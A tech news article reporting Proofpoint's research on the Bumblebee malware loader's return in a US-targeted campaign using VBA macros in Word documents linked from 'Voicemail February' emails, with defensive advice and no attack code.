Bumblebee malware wakes from hibernation, forgets what year it is, attacks with macros
Trying to break in with malicious Word documents? How very 2015 of you
The Bumblebee malware loader seemingly vanished from the internet last October, but it's back and - oddly - relying on a vintage vector to try and gain access.
First spotted in 2022 by researchers at Proofpoint – who identified it as an apparent replacement for BazarLoader – Bumblebee was originally used by high-profile ransomware groups including Russia-linked Conti.
Now it has been spotted buzzing back to life. But it's using a "significantly different" attack chain this time – relying on malicious VBA macros, of all things, which suggests it might not be in the hands of the same skilled operators who created it.
This latest Bumblebee campaign has been targeting organizations in the US with emails using the subject line "Voicemail February" and sent from info@quarlesaa.com.
The quarlesaa domain appears to belong to an actual business, which is reflected in the sample email lure included in the report. We've asked to see if the owner is aware that its email system is being used to send malicious emails but haven't heard back.
Contained in the email is a link to a OneDrive URL, where a Microsoft Word document is. The doc is entirely unrelated to the sender – the sample shows a mission statement for Humane, developer of an AI-powered pin – but has the malicious macro embedded within.
It's been more than a year since Microsoft updated its products to block VBA macros by default in a bid to cut off their use as a malicious attack vector. As the security team itself noted last May, the cyber criminal ecosystem underwent a "monumental shift" after Redmond's decision – quickly moving to different types of attacks.
Not so this latest campaign, which puts it at odds with other Bumblebee flights. Out of nearly 230 uses of Bumblebee since March 2022, Proofpoint said only five campaigns used macros – four of which relied on XL4 in Excel, while just one relied on VBA.
The rest of the intrusion attempts have used more evolved tactics – like malicious DLLs, HTML smuggling to drop RAR files, LNK files and zipped VBS attachments. Those are more akin to tactics Exotic Lily – an initial access broker tracked by Google's Threat Analysis Group – was using with Bumblebee in 2022.
If, somehow, a victim's system had re-enabled Word macros by default and this Bumblebee chain managed to trigger – which the security group told The Register it hasn't actually seen in the wild – the macro would create a script in the Windows temp directory that ran a series of PowerShell commands to download and run the Bumblebee DLL.
"We cannot say what the follow-on payload would be in this campaign, however historically Proofpoint has previously observed Bumblebee dropping Cobalt Strike, shellcode, and Sliver among other malware," Proofpoint senior threat intelligence analyst Selena Larson told us in an emailed statement.
This one should be easy to spot
Indicators of compromise are included in the report on this Bumblebee resurgence campaign. But let's be realistic – such an outmoded attack shouldn't be a threat anymore, not to mention the mish-mash of themes in the email and the very basic malicious attachment.
"The URL in the email went to a document that was not related to a voicemail theme, which may appear unusual or possibly malicious to an end user," Larson told us. "Organizations should train users to recognize potentially suspicious activity based on commonly observed themes and lures, and report to security teams when observed."
- Malware loader lowdown: The big 3 responsible for 80% of attacks so far this year
- Microsoft took its macros and went home, so miscreants turned to Windows LNK files
- Google password resets not enough to stop these info-stealing malware strains
- Malvertising attacks are distributing .NET malware loaders
Beyond that, the usual advice of keeping Windows and Microsoft Office installations up to date applies, as does making sure macros are disabled by default and ensuring none of your savvier users have taken it upon themselves to re-enable them.
Unsurprisingly, Proofpoint doesn't think this campaign is linked to a tracked threat actor – despite the fact that the voicemail lure, use of OneDrive, and sender email address align with previous activity from the North Korean-aligned TA579, which has been behind previous Bumblebee campaigns.
Regardless of this threat, Proofpoint said Bumblebee's return is indicative of a surge in threat actor activity so far in 2024. Even if this campaign is a bit janky, they won't all be.
"Proofpoint researchers continue to observe new, creative attack chains, attempts to bypass detections, and updated malware from many threat actors and unattributed threat clusters," it warned. "Researchers are expecting this high operational tempo to continue until the anticipated summer threat actor breaks." ®